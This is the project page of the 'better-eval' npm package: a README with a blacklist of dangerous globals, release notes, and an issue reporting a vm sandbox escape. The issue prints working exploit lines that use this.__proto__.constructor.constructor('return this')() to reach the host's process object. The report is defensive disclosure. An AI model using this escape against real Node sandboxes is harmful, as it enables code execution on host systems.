🔧 Alternative to 'eval' in JavaScript that is customizable and safer!

Overview

🔧 better-eval

An alternative to eval() in JavaScript that is customizable and safer!

The eval function sucks, and there is a lack of alternatives that offer the same simplicity as the original eval function. better-eval solves this problem by addressing the security and speed issues while delivering a sensible API.


Why Better-Eval?

  • 🕊 Small and lightweight.
  • ⚡ A simple and easy-to-use API.
  • 🛠️ Easily customizable for your needs.
  • ✅ Tested and maintained.

Installation

npm install better-eval

Usage

First, import the package:

const betterEval = require("better-eval");

Then call the function with something you want to be evaluated:

betterEval("1+1"); // returns 2

And it's as simple as that! Evaluated code cannot access variables you define unless they are explicitly passed in.

Passing Variables

Include any variables as part of an object which you pass in as the second parameter:

const name = "Sam";

betterEval("`Hey ${name}`", { name }); // returns 'Hey Sam'

You can also pass functions as a part of the second parameter, and evaluate them in your code:

const returnName = () => "Bob";

betterEval("`Hey ${returnName()}`", { returnName }); // returns 'Hey Bob'

Blacklist

For your safety, the following global variables are on the blacklist and will not be added to your variables even if you pass them:

  • global
  • process
  • module
  • require
  • document
  • window
  • Window
  • eval
  • Function

Here is how they will be handled:

betterEval("`Sum is ${eval('1+1')}`", { eval }); // eval is null!

Remember: never use better-eval blindly with user code. These checks are precautions for your own usage, but any user with malicious intent could find a way to get through them. Thus, use this package with caution.

Configuring the VM

If you want more control over the VM that runs your code, you can pass in a vmOptions parameter:

betterEval(
  "1+1", {},
  {
    fileName: "counting",
    lineOffset: 1,
  }
);

A complete list of options can be found here.

License

better-eval is MIT-licensed open-source software created by Bharadwaj Duggaraju.

Comments
  • Exploit due to the use of the Node std vm module

    Disclaimer: I might be understanding something wrong, but such a simple exploit should be avoided. In the README, it is claimed to be a safer alternative to eval.

    BetterEval Version: 1.3.0
    Node Version: 14.20.0
    Operating System: Windows 10 & Linux
    Type: Obtaining the global object of the main context

    Exploit code:

    const betterEval = require("better-eval")

    // Each call reaches the main context's global object through the sandbox's
    // prototype chain, so the blacklist on passed-in variables is bypassed.
    console.log(betterEval("this.__proto__.constructor.constructor('return this')().process"))
    console.log(betterEval("this.__proto__.constructor.constructor('return this')()"))
    console.log(betterEval("this.__proto__.constructor.constructor('return this')().eval"))
    console.log(betterEval("this.__proto__.constructor.constructor('return this')().Function"))

    Ideas on how to fix it:

    • set the proto of this to null

    Implications of fix:

    • All functions inherited from Object can't be used on this
    • They can be obtained by using ({})[function]
    • ({}).__proto__.constructor.constructor is not a function and thus can't be exploited
    • (()=>{}).constructor(.constructor, ...) always lives in the cleared context and can't be exploited either.

    Sorry for my bad English

    opened by FishingHacks 0
Releases(v1.3.0)
  • v1.3.0(Mar 13, 2022)

    v1.3.0

    It's been a while, but I decided to make some final changes to leave the codebase in top notch shape:

    • New logo.
    • New description - makes it clearer what better-eval is.
    • JS Doc fixes.

    🥇 Happy coding!

  • v1.2.7(Feb 8, 2022)

    v1.2.7

    After a month of hard work, better-eval's development has come to an end.

    Changes in this release are minor documentation changes, and final test documentation.

    If there are any issues, feel free to leave them as I will still continue maintenance work as needed.

    But no new features will be added.

    💯 Happy Coding.

  • v1.2.6(Feb 7, 2022)

    v1.2.6

    The only reason I published this release was to emphasize that this package is to not be used blindly with user code. I don't want this package to be a security issue, and after getting some feedback, I wanted to get a warning release out as soon as possible. Anyways, hopefully this package still serves a purpose in the evaluation field, if not, feel free to leave an issue.

    💯 Happy Coding!

  • v1.2.5(Feb 4, 2022)

  • v1.2.4(Feb 4, 2022)

    v.1.2.4

    Changes in this release:

    • Documentation updates and typos.
    • Tests for all blacklisted variables.
    • HUGE: beginning of blacklisting variables for nested variables and other possible exploits.

    🔒 Happy coding!

  • 1.2.3(Feb 3, 2022)

    v.1.2.3

    Changes in this release:

    • Launch on product hunt & tag.
    • New section for blacklisted variables.
    • Refactor docs & make them easier to navigate.

    🥇 Happy Coding!

  • 1.2.2(Jan 28, 2022)

    v.1.2.2

    Here are some of the changes that occurred in this release:

    • More restrictions on unsafe functions.
    • Refactoring of code for easier development.
    • Retesting and typo fixes.

    💯 Happy coding!

  • 1.2.0(Jan 23, 2022)

    v.1.2.0

    Here are some of the changes that occurred in this release:

    • Some formatting fixes.
    • Documentation typo fixes.
    • Badges to indicate size.

    💯 Happy coding!

  • 1.1.9(Jan 20, 2022)

    v1.1.9

    First of all, sorry for the huge package version leap - I had some bugs with NPM, and this ended up being the only solution.

    With that out of the way, here are some changes that have been made:

    • Complete test coverage.
    • Scripts for developers.
    • Documentation fixes.
    • Some minor package improvements.

    Some new improvements for contributors should be coming soon, so be on the lookout for that. Happy coding!

  • 1.0.9(Jan 17, 2022)

    v.1.0.9

    I'm very excited to be releasing the first tested and production ready version of better-eval! After around a week of work, hours of debugging, testing, and developing, I believe better-eval is a suitable option for evaluating code.

    Feel free to leave an issue in the issue tab, and if you want any changes to be made, a PR is much appreciated.

    💯 Happy coding!

Owner
Bharadwaj Duggaraju (web dev & open source)